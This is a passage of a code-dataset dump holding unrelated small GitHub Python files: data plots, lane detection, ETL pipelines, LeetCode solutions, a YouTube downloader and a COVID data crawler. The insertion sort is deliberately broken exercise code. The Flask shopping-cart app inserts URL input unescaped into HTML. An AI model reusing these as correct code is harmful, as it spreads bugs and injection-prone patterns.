str(l_result.student_id.last_name)\n course = str(l_result.session_id.course_id)\n level = str(l_result.session_id.level_id)\n session = str(l_result.session_id)\n attendance = str(l_result.attendance)\n theoretical = str(l_result.theoretical_mark)\n practical = str(l_result.practical_mark)\n avrage = str(l_result.result)\n result = str(l_result.result_type)\n vlues = [id, fname, lname, course, level, session,\n attendance, theoretical, practical, avrage, result]\n rows.append(vlues)\n for row in rows:\n row_num += 1\n for col_num in range(len(row)):\n ws.write(row_num, col_num, row[col_num], font_style)\n wb.save(response)\n return response","repo_name":"MohamadNashaat/almaher","sub_path":"result/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43178347989","text":"import random\n\n'''\n 生产者向消费者请求数据\n'''\ndef consumer():\n while True:\n item = yield\n print('Consume ', item)\n\ndef producer(c):\n # 使生成器继续运行,并且传递的参数为yield的返回值\n c.send(None)\n while True:\n item = random.randint(1, 100)\n print('Produce ', item)\n c.send(item)\n\nif __name__ == '__main__':\n c = consumer()\n producer(c)","repo_name":"DepInjoy/BaseHouse","sub_path":"Python/Base/ProducerConsumer/CoroutinesP-C.py","file_name":"CoroutinesP-C.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7523234486","text":"from customSorter import CustomSorter\nfrom arrays import swapTwoNumbers\n\nclass InsertionSorter(CustomSorter):\n\n def sort(self):\n print(\"Sorting with Insertion Sort.\")\n\n arraySize = len(self.array)\n for i in range(1, arraySize-2):\n j = i\n while j > 0 and self.array[j - 1] < self.array[j]:\n swapTwoNumbers(self.array, j, j - 1)\n j -= 1","repo_name":"edupinhata/codeInterview","sub_path":"Problems/FixTheCode/FTC_1_sorting-algorithms/python/source/insertionSorter.py","file_name":"insertionSorter.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"36216646816","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport matplotlib.pyplot as plt\n\nmarkers = ['o','v','^','s','*','+','x','D','1','X','d','2','8','P','>','p','<']\ncolors = ['b','g','r','c','m','y','k','gray','pink','lime','lightblue','orange','brown','purple','cyan','olive','black']\n\ndata_list = ['Electrical','Conditional','Appliances','Real-time','Industry','Facebook1','Beijing',\n 'Physicochemical','Traffic','Blog','Power','Online','Facebook2','Year','Query','GPU','Wave']\ndata_dirs = [\"Electrical Grid Stability\",\"Conditional Based Maintenance\",\"Appliances energy prediction\",\n \"Real-time Election\",\"Industry Energy Consumption\",\"facebook1\",\"Beijing PM2.5\",\n \"Physicochemical Properties\",\"Traffic Volume\",\"blog\",\"Power consumption of T\",\n \"Online Video\",\"facebook2\",\"year\",\"Query Analytics\",\"GPU kernel performance\",\"wave\"]\ndata_dirs = dict(zip(data_list,data_dirs))\n\n#==============================================================================\n\npdf = PdfPages(\"sigma_42.pdf\")\nplt.figure(figsize=(8,4),dpi=300)\n\ni = 0\nmeasures = []\nfor data_name in data_list:\n results = pd.read_csv(\"../../usnrt/results/\" + data_dirs[data_name] + \"/usnrt.csv\")\n results = results[results['train_test_seed']==42]\n \n sigma2 = [float(x) for x in results.iloc[0]['sigma2'][1:-1].split(', ')]\n sigma = sorted(np.sqrt(sigma2))\n measures.append([data_name, np.std(np.log(sigma))])\n \n plt.scatter([i+1]*len(sigma), sigma, marker=markers[i], color=colors[i], label=data_name)\n i = i+1\n\nplt.legend(framealpha=0.5,fontsize=8)\nplt.xlim([0,21])\nplt.ylim([0,1.5])\nplt.xticks(range(1,18))\npdf.savefig(bbox_inches='tight')\nplt.close()\npdf.close()\n\n#==============================================================================\n\nmeasures = sorted(measures, reverse = True, key = lambda x: x[1])\nwith open(\"sigma_42.txt\", 'w') as file:\n for elem in measures:\n file.write(\"{} & {:.2f} \\\\\\\\\\n\".format(elem[0], elem[1]))\n\n\n\n","repo_name":"xingyan-fml/usnrt","sub_path":"collectResults/uncertainty_of_leaf_regions/sigma_42.py","file_name":"sigma_42.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"19971026660","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef make_coordinates(frame, line_parameters):\n slope, intercept = line_parameters\n y1 = frame.shape[0]\n y2 = int(y1*(3/5))\n x1 = int((y1 - intercept)/slope) \n x2 = int((y2 - intercept)/slope)\n return np.array([x1, y1 ,x2 ,y2])\n\ndef average_slope_intercept(frame,lines):\n left_fit = []\n right_fit = []\n for line in lines:\n x1 ,y1 , x2 , y2 =line.reshape(4)\n parameters = np.polyfit((x1,x2),(y1,y2), 1)\n slope = parameters[0]\n intercept = parameters[1]\n if slope < 0:\n left_fit.append((slope, intercept))\n else:\n right_fit.append((slope, intercept))\n left_fit_average = np.average(left_fit, axis=0)\n right_fit_average = np.average(right_fit, axis=0)\n left_line = make_coordinates(frame, left_fit_average)\n right_line = make_coordinates(frame, right_fit_average)\n return np.array([left_line, right_line])\n\n\n# function สำหรับการเปลี่ยนรูป rgb เป็นรูปขาวดำ โดยที่ในฟังชั่นมีการเบลอรูปเพื่อลบ object ที่ไม่ต้องการออก\ndef image2canny(frame):\n gray_img = cv2.cvtColor(frame,cv2.COLOR_RGB2GRAY)\n blur_img = cv2.GaussianBlur(gray_img,(5,5),0)\n canny = cv2.Canny(blur_img,50,150)\n return canny\n \ndef display_lines(frame,lines):\n line_img = np.zeros_like(frame)\n if lines is not None:\n for line in lines:\n x1, y1, x2, y2 = line.reshape(4)\n cv2.line(line_img, (x1 ,y1),(x2, y2), (255, 0, 0), 10) \n return line_img\n\n\n# function นี้มีไว้สำหรับสร้างรูปสามเหลี่ยมที่คาดว่าจะมีเลนในพื้นที่นี้\ndef region_of_interest(frame):\n height = frame.shape[0]\n polygons = np.array([[(125,height),(850,height),(482,302)]])\n mask = np.zeros_like(frame)\n cv2.fillPoly(mask, polygons, 255)\n masked_img = cv2.bitwise_and(frame,mask) \n return masked_img\n\ncap = cv2.VideoCapture('solidWhiteRight.mp4')\n\nwhile(cap.read()):\n ref,frame = cap.read()\n roi = frame[:1080,0:1920]\n\n \n canny_img = image2canny(frame)\n cropped_img = region_of_interest(canny_img)\n lines = cv2.HoughLinesP(cropped_img, 2, np.pi/180, 100, np.array([]),minLineLength=40, maxLineGap=5)\n averaged_line = average_slope_intercept(frame,lines)\n line_img = display_lines(frame,averaged_line)\n combo_img = cv2.addWeighted(frame, 0.8, line_img, 1, 1)\n \n cv2.imshow(\"combo\",roi)\n\n if cv2.waitKey(1) & 0xff==ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"SabigBenmumin/Roselle","sub_path":"model_original/lane_difinding_1/play_video.py","file_name":"play_video.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34338631389","text":"from mowgli_etl._pipeline import _Pipeline\nfrom mowgli_etl.pipeline.swow.swow_constants import SWOW_ARCHIVE_PATH\nfrom mowgli_etl.pipeline.swow.swow_extractor import SwowExtractor\nfrom mowgli_etl.pipeline.swow.swow_transformer import SwowTransformer\n\n\nclass SwowPipeline(_Pipeline):\n \"\"\"\n ETL pipeline that extracts from the Small World of Words corpus.\n\n https://smallworldofwords.org\n \"\"\"\n\n def __init__(self, *, swow_archive_path: str = SWOW_ARCHIVE_PATH, **kwds):\n _Pipeline.__init__(\n self,\n extractor=SwowExtractor(swow_archive_path=swow_archive_path),\n id=\"swow\",\n transformer=SwowTransformer(),\n **kwds\n )\n\n @classmethod\n def add_arguments(cls, arg_parser):\n _Pipeline.add_arguments(arg_parser)\n arg_parser.add_argument(\n \"--swow-archive-path\",\n help=\"Path to a bz2 archive to use as a source of SWOW data\",\n required=False,\n default=SWOW_ARCHIVE_PATH)\n","repo_name":"tetherless-world/mowgli-etl","sub_path":"mowgli_etl/pipeline/swow/swow_pipeline.py","file_name":"swow_pipeline.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"73827594725","text":"import catalogue\n\nfrom flask import Flask, request, url_for, render_template\ncost = 0\ncart = {}\ncart_str = \"\"\nuserName = None\n\napp = Flask(__name__)\n\n\n# url_for('static', filename='style.css')\n@app.route(\"/\")\ndef home(userName=None):\n return render_template('layout.html', name=userName)\n\n@app.route(\"//\")\ndef getUserName(userName):\n cart[userName] = {}\n return (f\"Welcome to NoN, {userName}\")\n\n\n@app.route('//')\ndef buyItem(userName, item):\n global cart, cart_str\n cart_str = \"\"\n # show the subpath after /path/\n if item not in cart[userName].keys() and item in catalogue.shopItems:\n cart[userName][item] = [1, catalogue.shopItems[item]]\n elif item not in catalogue.shopItems:\n return f\"No stock for {item}\"\n else:\n cart[userName][item][0]+=1\n for i,l in enumerate(cart[userName].items()):\n cart_str += f\"\\\n {i+1}\\\n {l[0]}\\\n {l[1][0]}\\\n {l[1][0]*l[1][1]}\\\n \"\n\n list = \"
\\\n This is your shopping cart!
\\\n \\\n \\\n \\\n \\\n \\\n \" \\\n + cart_str \\\n + \"
S/NItemQtyCost \\\n
\"\n print(cart)\n return (f\" You've added {item} into your Shopping Cart!

\" + list)\n\n\n'''\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
FirstnameLastnameAge
JillSmith50
EveJackson94
\n'''\n@app.route('//checkOut')\ndef checkOut(userName):\n global cart, cost\n cost = 0\n print(cart)\n print(cart[userName].values())\n for c in cart[userName].values():\n cost += c[0]*c[1]\n return f\"
\\\n

Checkout details

\\\n \\\n \\\n \\\n \\\n \\\n \" \\\n + cart_str \\\n + f\" \\\n \\\n \\\n \\\n \\\n \\\n
S/NItemQtyCost \\\n
Total cost:{cost}
\"\n\n@app.route('//checkOut/payment')\ndef payment(userName):\n global cart\n print(cart)\n cart[userName] = {}\n print(cart)\n return f\"You have paid {cost}!

Thank you and have a nice day! :)\"\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')\n\n\n\n'''@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n return do_the_login()\n else:\n return show_the_login_form()'''\n","repo_name":"jeremyng123/wthezmart","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41264770850","text":"def solution(priorities, location):\n answer = 0\n max_p = max(priorities)\n \n while True:\n item = priorities.pop(0)\n if max_p == item:\n answer += 1\n if location == 0:\n break\n else:\n location -= 1\n max_p = max(priorities)\n else:\n priorities.append(item)\n if location == 0:\n location = len(priorities) - 1\n else:\n location -= 1\n return answer","repo_name":"jungeun919/Programmers","sub_path":"Stack-Queue/프린터/code1.py","file_name":"code1.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3108247867","text":"# Given two lists of closed intervals, each list of intervals is pairwise disjoi\n# nt and in sorted order. \n# \n# Return the intersection of these two interval lists. \n# \n# (Formally, a closed interval [a, b] (with a <= b) denotes the set of real num\n# bers x with a <= x <= b. The intersection of two closed intervals is a set of re\n# al numbers that is either empty, or can be represented as a closed interval. For\n# example, the intersection of [1, 3] and [2, 4] is [2, 3].) \n# \n# \n# \n# \n# Example 1: \n# \n# \n# \n# \n# Input: A = [[0,2],[5,10],[13,23],[24,25]], B = [[1,5],[8,12],[15,24],[25,26]]\n# Output: [[1,2],[5,5],[8,10],[15,23],[24,24],[25,25]]\n# Reminder: The inputs and the desired output are lists of Interval objects, and\n# not arrays or lists.\n# \n# \n# \n# \n# Note: \n# \n# \n# 0 <= A.length < 1000 \n# 0 <= B.length < 1000 \n# 0 <= A[i].start, A[i].end, B[i].start, B[i].end < 10^9 \n# \n# \n# NOTE: input types have been changed on April 15, 2019. Please reset to defaul\n# t code definition to get new method signature. \n# \n# Related Topics Two Pointers\n\nfrom typing import List\n\n# leetcode submit region begin(Prohibit modification and deletion)\nimport heapq as h\n\n\ndef flattened_generator(arr, arr_id):\n for i, x in enumerate(arr):\n for j, y in enumerate(x):\n yield y, (j, arr_id)\n\n\ndef events(sorted_intervals_arrays):\n flattened_sorted_intervals_generators = [flattened_generator(x, i) for i, x in enumerate(sorted_intervals_arrays)]\n num_generators = len(flattened_sorted_intervals_generators)\n front = []\n for g in flattened_sorted_intervals_generators:\n try:\n x = next(g)\n front.append(x)\n except StopIteration:\n num_generators -= 1\n h.heapify(front)\n while len(front) > 0:\n y, (j,i) = h.heappop(front)\n yield y, (i, j)\n try:\n x = next(flattened_sorted_intervals_generators[i])\n h.heappush(front, x)\n except StopIteration:\n num_generators -= 1\n\n\nclass Solution:\n def intervalIntersection(self, A: List[List[int]], B: List[List[int]]) -> List[List[int]]:\n available_people = set()\n num_people = 2\n ret = []\n start = None\n for ts, (i, j) in events([A, B]):\n if j == 0:\n available_people.add(i)\n if len(available_people) == num_people:\n start = ts\n else:\n if start is not None:\n ret.append([start, ts])\n start = None\n available_people.remove(i)\n return ret\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\ndef test():\n ts = [([[0, 2], [5, 10], [13, 23], [24, 25]],\n [[1, 5], [8, 12], [15, 24], [25, 26]],\n [[1, 2], [5, 5], [8, 10], [15, 23], [24, 24], [25, 25]])]\n s = Solution()\n for a, b, ans in ts:\n actual = s.intervalIntersection(a, b)\n print(a, b, ans, actual)\n assert ans == actual\n","repo_name":"sunilnandihalli/leetcode","sub_path":"editor/en/[986]Interval List Intersections.py","file_name":"[986]Interval List Intersections.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32415749363","text":"from datetime import datetime\nfrom os import path, remove\n\nfrom odf.opendocument import load\nfrom odf import text, draw, teletype, style, element\nfrom odf.element import Node\n\n#infile = 'contrat.odt'\n#outfile = 'contrat{}.odt'.format(2)\n#dict = {\"#object_number\": \"0001\", \"#quote_number\": \"1010\", \"#show_name\": \"Jason Mist DUO\", \"#show_conditions\": \"min. 15000 personnes\", \"#technical_contact\": \"Norman ALIÉ (06 74 87 22 12)\", \"#show_date\": \"25/12/2021\", \"#price_excl\": \"42.00\", \"#taxes\": \"0.69\", \"#price_incl\": \"42.69\", \"#price_letter\": \"Universal Answer € and Nice cts\", \"#date\": \"01/01/1980\"}\n\n\nclass Contract():\n @classmethod\n def generate(cls, infile, datas_dic):\n \"\"\"\n Generate a contract file from an input file (.odt).\n Look for datas_dic.keys and replace them by datas_dic.value\n Return the ouput file path\n \"\"\"\n if not path.exists(infile):\n return 1\n\n doc = load(infile)\n outfile = path.join(path.dirname(infile), f'contract-{datetime.now().strftime(\"%d-%m-%Y-%H-%M-%S\")}.odt' )\n for item in doc.getElementsByType(text.P):\n for child in item.childNodes:\n nodeReplaceText(child, datas_dic)\n \n doc.save(outfile)\n return outfile\n\n @classmethod\n def delete(cls, file):\n if path.exists(file):\n remove(file)\n return 0\n else:\n return 1\n\ndef nodeReplaceText(node, dic, depth=1):\n if node and node.nodeType == Node.TEXT_NODE:\n for k, v in dic.items():\n if node.data.find(k) != -1:\n node.data = node.data.replace(k, v)\n \n while(node and node.childNodes != 0 and depth<=100):\n for child in node.childNodes:\n return nodeReplaceText(child, dic, depth+1)\n return 0\n return 0\n\n","repo_name":"normanalie/dolimore","sub_path":"app/contract/contract.py","file_name":"contract.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8252811000","text":"import leetcode\nimport os\nimport googleapiclient.discovery\nimport google_auth_oauthlib.flow\nimport googleapiclient.errors\nfrom pytube import Playlist, YouTube\nfrom pytube.cli import on_progress\nfrom time import sleep\nimport sys\nfrom random import choice, randint\n\nclass LeetcodeApiStuff():\n def init_API(self) -> None:\n \"\"\"Initialize the Leetcode API, logins and conf\"\"\" \n # Get the next two values from your browser cookies\n leetcode_session = os.environ.get('LEETCODE_SESSION_TOKEN')\n csrf_token = os.environ.get('LEETCODE_CSRF_TOKEN')\n configuration = leetcode.Configuration()\n configuration.api_key[\"x-csrftoken\"] = csrf_token\n configuration.api_key[\"csrftoken\"] = csrf_token\n configuration.api_key[\"LEETCODE_SESSION\"] = leetcode_session\n configuration.api_key[\"Referer\"] = \"https://leetcode.com\"\n configuration.debug = False\n\n api_instance = leetcode.DefaultApi(leetcode.ApiClient(configuration))\n\n return api_instance.api_problems_topic_get(topic=\"algorithms\")\n\n def count_solved_problems(self)->int:\n \"\"\"Counts the number of leetcode pblm solved\"\"\"\n counter = 0\n\n slug_to_solved_status = {\n pair.stat.question__title_slug: True if pair.status == \"ac\" else False\n for pair in self.api_response.stat_status_pairs\n }\n \n for pblm in slug_to_solved_status:\n if slug_to_solved_status[pblm]: counter +=1\n return counter\n\n def verify(self, initial)->bool:\n \"\"\"Compare the number of pbm solved when the alarm first ring and now \"\"\"\n final = self.count_solved_problems()\n print(initial)\n if final > initial:\n return True\n print(final)\n return False\n\nclass YT:\n def get_proxies(self):\n self.proxies =[]\n with open('http_proxies.txt', 'r') as f:\n lines = f.readlines()\n for n,line in enumerate(lines):\n self.proxies.append(line.strip())\n \n def download_vids(self,url='https://www.youtube.com/playlist?list=PLWgaqOxA2CoCG9IAYjoMy2YSxt_X5AG3J'):\n pl = Playlist(url)\n for i,url in enumerate(pl.video_urls):\n print(f'Downloading: {pl.videos[i].title}')\n YouTube(url=url,proxies={'http': f'{choice(self.proxies)}'},on_progress_callback=on_progress).streams.filter(progressive=True).get_highest_resolution().download('./Tone/')\n \n","repo_name":"skillz4real/LT-serving-alarm","sub_path":"APIs.py","file_name":"APIs.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43353813907","text":"import csv\nfrom os import listdir\nfrom collections import Counter\n\nfrom _utility.cache_by_date import cache_by_date\nfrom _utility.get_package_dir import get_data_dir\nfrom _utility.normalize_locality_name import normalize_locality_name\nfrom covid_db.datatypes.DataPoint import DataPoint\nfrom covid_db.datatypes.enums import Schemas, DataTypes\nfrom covid_db.datatypes.DatapointMerger import DataPointMerger\nfrom covid_crawlers._base_classes.URLBase import URL, URLBase\n\n\nclass ExpiringCounter(Counter):\n def __init__(self, *args, **kw):\n Counter.__init__(self, *args, **kw)\n self.__changed = set()\n\n def items(self):\n for k in self.__changed:\n yield k, self[k]\n self.__changed = set()\n\n def __setitem__(self, key, value):\n Counter.__setitem__(self, key, value)\n self.__changed.add(key)\n\n\nclass VicCSV(URLBase):\n SOURCE_ID = 'au_vic_dhhs_csv'\n SOURCE_URL = 'https://www.dhhs.vic.gov.au/coronavirus'\n SOURCE_DESCRIPTION = ''\n\n def __init__(self):\n URLBase.__init__(self,\n output_dir=get_data_dir() / 'vic' / 'csv_data',\n urls_dict={\n 'lga.json': URL('https://docs.google.com/spreadsheets/d/e/2PACX-1vQ9oKYNQhJ6v85dQ9qsybfMfc-eaJ9oKVDZKx-VGUr6szNoTbvsLTzpEaJ3oW_LZTklZbz70hDBUt-d/pub?gid=0&single=true&output=csv',\n static_file=False),\n 'postcode.json': URL('https://docs.google.com/spreadsheets/d/e/2PACX-1vTwXSqlP56q78lZKxc092o6UuIyi7VqOIQj6RM4QmlVPgtJZfbgzv0a3X7wQQkhNu8MFolhVwMy4VnF/pub?gid=0&single=true&output=csv',\n static_file=False),\n 'agegroup.csv': URL('https://www.dhhs.vic.gov.au/ncov-covid-cases-by-age-group-csv',\n static_file=False),\n 'all_lga.csv': URL('https://www.dhhs.vic.gov.au/ncov-covid-cases-by-lga-csv',\n static_file=False),\n 'all_lga_acquired_source': URL('https://www.dhhs.vic.gov.au/ncov-covid-cases-by-lga-source-csv',\n static_file=False),\n 'all_acquired_source': URL('https://www.dhhs.vic.gov.au/ncov-covid-cases-by-source-csv',\n static_file=False)\n }\n )\n self.update()\n\n def get_datapoints(self):\n r = DataPointMerger()\n for date in r.iter_unprocessed_dates(sorted(listdir(get_data_dir() / 'vic' / 'csv_data'))):\n r.extend(self._get_postcode_datapoints(date))\n r.extend(self._get_lga_datapoints(date))\n\n #print(get_data_dir(), date)\n\n if (get_data_dir() / 'vic' / 'csv_data' / date / 'agegroup.csv').exists():\n r.extend(self._get_agegroup_datapoints(date))\n if (get_data_dir() / 'vic' / 'csv_data' / date / 'all_lga.csv').exists():\n r.extend(self._get_all_lga_datapoints(date))\n if (get_data_dir() / 'vic' / 'csv_data' / date / 'all_lga_acquired_source').exists():\n r.extend(self._get_all_lga_acquired_source_datapoints(date))\n if (get_data_dir() / 'vic' / 'csv_data' / date / 'all_acquired_source').exists():\n r.extend(self._get_all_acquired_source_datapoints(date))\n return r\n\n @cache_by_date(SOURCE_ID + '_all_lga_acquired_source')\n def _get_all_lga_acquired_source_datapoints(self, date):\n r = []\n current_date = None\n by_postcode = {}\n by_lga = {}\n\n sources = {\n 'Acquired in Australia, unknown source': DataTypes.SOURCE_COMMUNITY,\n 'Contact with a confirmed case': DataTypes.SOURCE_CONFIRMED,\n 'Travel overseas': DataTypes.SOURCE_OVERSEAS,\n 'Under investigation': DataTypes.SOURCE_UNDER_INVESTIGATION\n }\n\n with open(get_data_dir() / 'vic' / 'csv_data' / date / 'all_lga_acquired_source', 'r', encoding='utf-8') as f:\n for row in sorted(csv.DictReader(f), key=lambda x: x['diagnosis_date']) + \\\n [{'diagnosis_date': '1111-01-01',\n 'Postcode': None,\n 'Localgovernmentarea': None,\n 'acquired': None}]:\n\n date_updated = self.convert_date(row['diagnosis_date'])\n\n if current_date != date_updated:\n if current_date is not None:\n #for postcode, by_source in by_postcode.items():\n # for source, value in by_source.items():\n # r.append(DataPoint(\n # region_schema=Schemas.POSTCODE,\n # region_parent='AU-VIC',\n # region_child=postcode,\n # datatype=sources[source],\n # value=int(value),\n # date_updated=current_date,\n # source_url=self.SOURCE_URL,\n # source_id=self.SOURCE_ID\n # ))\n for lga, by_source in by_lga.items():\n for source, value in by_source.items():\n r.append(DataPoint(\n region_schema=Schemas.LGA,\n region_parent='AU-VIC',\n region_child=normalize_locality_name(lga),\n datatype=sources[source],\n value=int(value),\n date_updated=current_date,\n source_url=self.SOURCE_URL,\n source_id=self.SOURCE_ID\n ))\n current_date = date_updated\n\n if row['Localgovernmentarea']:\n by_lga.setdefault(row['Localgovernmentarea'].split('(')[0].strip(), ExpiringCounter())[row['acquired']] += 1\n if row['Postcode']:\n by_postcode.setdefault(row['Localgovernmentarea'].strip('_'), ExpiringCounter())[row['acquired']] += 1\n\n return r\n\n @cache_by_date(SOURCE_ID + '_all_acquired_source')\n def _get_all_acquired_source_datapoints(self, date):\n r = []\n current_date = None\n by_source = Counter()\n\n sources = {\n 'Acquired in Australia, unknown source': DataTypes.SOURCE_COMMUNITY,\n 'Contact with a confirmed case': DataTypes.SOURCE_CONFIRMED,\n 'Travel overseas': DataTypes.SOURCE_OVERSEAS,\n 'Under investigation': DataTypes.SOURCE_UNDER_INVESTIGATION\n }\n\n with open(get_data_dir() / 'vic' / 'csv_data' / date / 'all_acquired_source', 'r', encoding='utf-8') as f:\n for row in sorted(csv.DictReader(f), key=lambda x: x['diagnosis_date']) + \\\n [{'diagnosis_date': '1111-01-01', 'acquired': None}]:\n\n date_updated = self.convert_date(row['diagnosis_date'])\n\n if current_date != date_updated:\n if current_date is not None:\n for source, value in by_source.items():\n r.append(DataPoint(\n region_schema=Schemas.ADMIN_1,\n region_parent='AU',\n region_child='AU-VIC',\n datatype=sources[source],\n value=int(value),\n date_updated=current_date,\n source_url=self.SOURCE_URL,\n source_id=self.SOURCE_ID\n ))\n current_date = date_updated\n\n if row['acquired']:\n by_source[row['acquired'].strip('_')] += 1\n return r\n\n @cache_by_date(SOURCE_ID + '_all_lga')\n def _get_all_lga_datapoints(self, date):\n r = []\n current_date = None\n by_agegroup = ExpiringCounter()\n\n with open(get_data_dir() / 'vic' / 'csv_data' / date / 'all_lga.csv', 'r', encoding='utf-8') as f:\n for row in sorted(csv.DictReader(f), key=lambda x: x['diagnosis_date']) + \\\n [{'diagnosis_date': '1111-01-01', 'Localgovernmentarea': None}]:\n\n date_updated = self.convert_date(row['diagnosis_date'])\n\n if current_date != date_updated:\n if current_date is not None:\n for lga, value in by_agegroup.items():\n r.append(DataPoint(\n region_schema=Schemas.LGA,\n region_parent='AU-VIC',\n region_child=normalize_locality_name(lga.split('(')[0].strip()),\n datatype=DataTypes.TOTAL,\n value=int(value),\n date_updated=current_date,\n source_url=self.SOURCE_URL,\n source_id=self.SOURCE_ID\n ))\n current_date = date_updated\n\n if row['Localgovernmentarea']:\n by_agegroup[row['Localgovernmentarea'].strip('_')] += 1\n return r\n\n @cache_by_date(SOURCE_ID+'_agegroup')\n def _get_agegroup_datapoints(self, date):\n r = []\n current_date = None\n by_agegroup = Counter()\n\n with open(get_data_dir() / 'vic' / 'csv_data' / date / 'agegroup.csv', 'r', encoding='utf-8') as f:\n for row in sorted(csv.DictReader(f), key=lambda x: x['diagnosis_date']) + \\\n [{'diagnosis_date': '1111-01-01', 'agegroup': None}]:\n\n assert len(row['diagnosis_date']) in (9, 10), row['diagnosis_date']\n date_updated = self.convert_date(row['diagnosis_date'])\n\n if current_date != date_updated:\n if current_date is not None:\n for agerange, value in by_agegroup.items():\n r.append(DataPoint(\n region_schema=Schemas.ADMIN_1,\n region_parent='AU',\n region_child='AU-VIC',\n datatype=DataTypes.TOTAL,\n agerange=agerange,\n value=int(value),\n date_updated=current_date,\n source_url=self.SOURCE_URL,\n source_id=self.SOURCE_ID\n ))\n current_date = date_updated\n\n if row['agegroup']:\n by_agegroup[row['agegroup'].strip('_')] += 1\n return r\n\n @cache_by_date(SOURCE_ID)\n def _get_postcode_datapoints(self, date):\n # postcode\tpopulation\tactive\tcases\trate\tnew\tband\tdata_date\n # \t3000\t37979\t18\t119\t47.4\t0\t2\t29/08/2020\n # \t3001\t0\t0\t1\t0\t0\t0\t29/08/2020\n # \t3002\t4957\t2\t14\t40.3\t0\t2\t29/08/2020\n # \t3003\t5516\t3\t36\t54.4\t0\t3\t29/08/2020\n # \t3004\t9311\t6\t63\t64.4\t2\t3\t29/08/2020\n # \t3005\t523\t0\t0\t0\t0\t0\t29/08/2020\n # \t3006\t18811\t1\t64\t5.3\t0\t1\t29/08/2020\n # \t3008\t10438\t2\t49\t19.2\t0\t1\t29/08/2020\n # \t3010\t1595\t0\t0\t0\t0\t0\t29/08/2020\n # \t3011\t21464\t36\t164\t167.7\t2\t4\t29/08/2020\n\n r = []\n print(\"PostCode:\", get_data_dir() / 'vic' / 'csv_data' / date)\n\n with open(get_data_dir() / 'vic' / 'csv_data' / date / 'postcode.json', 'r', encoding='utf-8') as f:\n for row in csv.DictReader(f):\n date_updated = self.convert_date(row['data_date'])\n\n for datatype, value in (\n (DataTypes.STATUS_ACTIVE, row['active']),\n (DataTypes.TOTAL, row['cases'])\n ):\n r.append(DataPoint(\n region_schema=Schemas.POSTCODE,\n region_parent='AU-VIC',\n region_child=row['postcode'],\n datatype=datatype,\n value=int(value),\n date_updated=date_updated,\n source_url=self.SOURCE_URL,\n source_id=self.SOURCE_ID\n ))\n return r\n\n @cache_by_date(SOURCE_ID+'_lga')\n def _get_lga_datapoints(self, date):\n # LGA\tlga_pid\tpopulation\tactive\tcases\trate\tnew\tband\tLGADisplay\tdata_date\n # \tAlpine (S)\tVIC242\t12814\t0\t1\t0\t0\t0\tAlpine\t29/08/2020\n # \tArarat (RC)\tVIC220\t11845\t1\t7\t8.4\t0\t1\tArarat\t29/08/2020\n # \tBallarat (C)\tVIC241\t109505\t6\t61\t5.5\t0\t1\tBallarat\t29/08/2020\n # \tBanyule (C)\tVIC188\t131631\t30\t437\t22.8\t0\t2\tBanyule\t29/08/2020\n # Bass Coast (S) VIC173\t36320\t0\t11\t0\t0\t0\tBass Coast\t29/08/2020\n # \tBaw Baw (S)\tVIC194\t53396\t1\t15\t1.9\t0\t1\tBaw Baw\t29/08/2020\n # \tBayside (C)\tVIC182\t106862\t72\t227\t67.4\t6\t3\tBayside\t29/08/2020\n # \tBenalla (RC)\tVIC199\t14037\t0\t3\t0\t0\t0\tBenalla\t29/08/2020\n\n r = []\n print(\"LGA:\", get_data_dir() / 'vic' / 'csv_data' / date)\n\n with open(get_data_dir() / 'vic' / 'csv_data' / date / 'lga.json', 'r', encoding='utf-8') as f:\n for row in csv.DictReader(f):\n #print(row)\n date_updated = self.convert_date(row['data_date'])\n\n for datatype, value in (\n (DataTypes.STATUS_ACTIVE, row['active']),\n (DataTypes.TOTAL, row['cases'])\n ):\n r.append(DataPoint(\n region_schema=Schemas.LGA,\n region_parent='AU-VIC',\n region_child=normalize_locality_name(row['LGA'].split('(')[0].strip()),\n datatype=datatype,\n value=int(value),\n date_updated=date_updated,\n source_url=self.SOURCE_URL,\n source_id=self.SOURCE_ID\n ))\n return r\n\n\nif __name__ == '__main__':\n from pprint import pprint\n pprint(VicCSV().get_datapoints())\n","repo_name":"mcyph/world_subnational_covid_crawler","sub_path":"covid_crawlers/oceania/au_data/vic/VicCSV.py","file_name":"VicCSV.py","file_ext":"py","file_size_in_byte":14332,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"75024627044","text":"#!/usr/bin/python3\n# -*- mode: 